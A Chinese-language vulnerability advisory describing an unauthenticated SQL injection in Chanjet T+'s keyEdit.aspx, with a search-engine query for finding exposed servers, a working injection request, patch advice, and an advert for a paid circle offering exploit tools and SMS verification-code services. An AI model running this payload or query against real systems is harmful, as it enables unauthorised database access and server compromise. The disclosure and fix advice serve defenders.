0x01 漏洞描述
由于畅捷通T+的keyEdit.aspx接囗处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x02 漏洞环境
Quake语法:app="畅捷通-TPlus"
0x03 漏洞复现
Poc
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@databases)%20--&preload=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
查询数据库列表
0x04 漏洞修复建议
关闭互联网暴露面或接口设置访问权限。目前官方已发布补丁更新,建议受影响用户尽快安装。
0x05 批量检测
0x06 圈子服务介绍
无论你是新手还是行业老手,我们都致力于为你提供最新、最优质的安全资源和交流平台。立即加入Sec探索者专属的内部圈子,与我们一起探索安全领域的无尽可能性!以下是我们圈子为内部成员提供的核心服务:
1、最新漏洞情报:提供最新的漏洞情报,第一时间复现和分析互联网暴露的重点高危漏洞,确保大家能第一时间掌握最新的漏洞动态
2、内部漏洞知识库:漏洞知识库正在持续建设中,我们将会提供详细的漏洞复现教程和poc,帮助大家深入理解漏洞的工作原理和利用方式。所有漏洞都是我们自己成功复现才会添加到知识库中,减少大家试错时间成本,我们将收集相对完整的漏洞信息、漏洞描述、分析以及针对每个漏洞的利用方法和防护建议,致力于打造一个全面且专业的漏洞知识库。
3、漏洞综合利用工具:提供多种漏洞利用工具,这些工具经过内部严格测试和大家的反馈,确保其有效性和安全性。无论大家是在进行渗透测试、漏洞验证,还是其他安全研究,这些工具都能为大家提供强有力的支持。
4、会员账号共享:我们提供空间测绘高级会员账号,方便大家用于资产收集;提供CMD5会员服务,用于解密MD5哈希值;我们提供短信接码平台,帮助大家在各种网络活动中进行手机号码验证。
5、圈子互动:每个人都可以成为内部圈子中的一员,这里有志同道合的朋友,大家可以相互分享经验、探讨问题,共同进步。无论大家在使用工具、访问知识库,还是进行其他活动中遇到问题,都可以随时联系我们,我们将竭诚为大家服务。
6、更多资源分享:我们会分享最新的安全资源,包括报告、工具、代码样本等,让大家始终能够获得前沿的信息和资源。随着成员人数的增加,我们提供的资源也会越来越多。我们将不断丰富和更新我们的服务内容,以满足大家不断增长的需求。
加入内部圈子(好的资源永远都在小圈子里面),我们期待与大家一起共同成长,探索网络安全的无限可能!
也欢迎各位师傅们进我们公开的交流群,有任何技术问题都可以在群内进行交流讨论,进群方式如下,需要进群请加运营备注 加群 哦